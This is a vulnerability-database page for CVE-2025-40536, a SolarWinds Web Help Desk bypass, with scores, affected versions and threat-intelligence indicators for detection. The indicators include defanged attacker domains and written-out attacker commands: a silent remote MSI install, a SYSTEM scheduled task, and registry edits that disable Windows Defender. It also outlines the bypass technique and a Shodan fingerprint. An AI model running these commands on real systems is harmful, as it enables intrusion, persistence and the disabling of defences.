cbcvebase.
CVE-2025-40536
published 2026-01-28

CVE-2025-40536: SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-02-15
Exploited in the wild
EPSS
81.62%
99.6th percentile
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.

Affected

2 ranges
VendorProductVersion rangeFixed in
solarwindsweb_help_desk< 2026.12026.1
solarwindsweb_help_desk

Detection & IOCsextracted from sources · hover to see the quote

urlhxxps://files.catbox[.]moe/tmp9fc.msi
urlhxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
urlhxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
domainvdfccjpnedujhrzscjtq.supabase[.]co
domainauth.qgtxtebl.workers[.]dev
domainv2-api.mooo[.]com
pathC:\ProgramData\Microsoft\code.exe
pathC:\Program Files\Velociraptor\Velociraptor.exe
pathC:\Program Files\WebHelpDesk\version.txt
commandmsiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
commandSCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
commandreg add "HKLM\SYSTEM\CurrentControlSet\Services\mpssvc" /v Start /t REG_DWORD /d 4 /f
commandreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
commandreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
commandreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealTimeMonitoring /t REG_DWORD /d 1 /f
commandnet group "domain computers" /do
registryHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOAVProtection
registryHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\SpynetReporting
port22022
url{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa
otherhttp.favicon.hash:1895809524
otherTPMProfiler
otheresmahyft@proton[.]me
sigma
any where host.os.type == "windows" and (
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
  • Initial exploitation chain: wrapper.exe spawns java.exe which spawns cmd.exe under the WHD install path. Alert on cmd.exe, powershell.exe, or rundll32.exe with a parent matching C:\Program Files\WebHelpDesk\*\java*.exe.
  • Velociraptor version 0.73.4 (outdated, with a privilege escalation vulnerability) was used as attacker C2. Detect Velociraptor service running with client.config.yaml pointing to Cloudflare Workers or mooo.com domains.
  • C2 failover mechanism: monitor for PowerShell scripts that probe /reader endpoint on v2-api.mooo[.]com and rewrite C:\Program Files\Velociraptor\client.config.yaml, then restart the Velociraptor service.
  • Detect DLL loads from UNC/network paths (\Device\Mup\*) or unsigned DLLs loaded by java.exe under the WebHelpDesk install directory as an indicator of exploitation.
  • The CVE-2025-40536 bypass involves including '/ajax/' in a query parameter to circumvent URI validation; switching from '/ajax/' to '/wo/' endpoints bypasses payload sanitization. Monitor WHD web logs for requests to /wo/ endpoints with badparam=/ajax/ query strings.
  • Shodan fingerprint for exposed SolarWinds Web Help Desk instances: http.favicon.hash:1895809524. Use for asset discovery and attack surface monitoring.
  • Nuclei version check: WHD versions reporting build token < 12.8.8.2585 (via regex \?v=([0-9]+_[0-9]+_[0-9]+_[0-9]+) in page body) are vulnerable to CVE-2025-40536.
  • Attacker used an Elastic Cloud free trial on GCP as a victim-data exfiltration backend (SIEM-as-C2). Investigate PowerShell executing Get-ComputerInfo and shipping results to external Elasticsearch endpoints.
  • ·CVE-2025-40536 is a security control bypass (CSRF whitelist bypass) that is chained with CVE-2025-40551 (JNDI deserialization RCE) to achieve unauthenticated RCE. Neither CVE alone is sufficient for full exploitation in the chained attack path.
  • ·Elastic Security Labs did not observe direct telemetry for this activity at time of publication; detections are based on third-party reporting (Microsoft, Huntress, Cisco Talos).

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.1HIGH
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.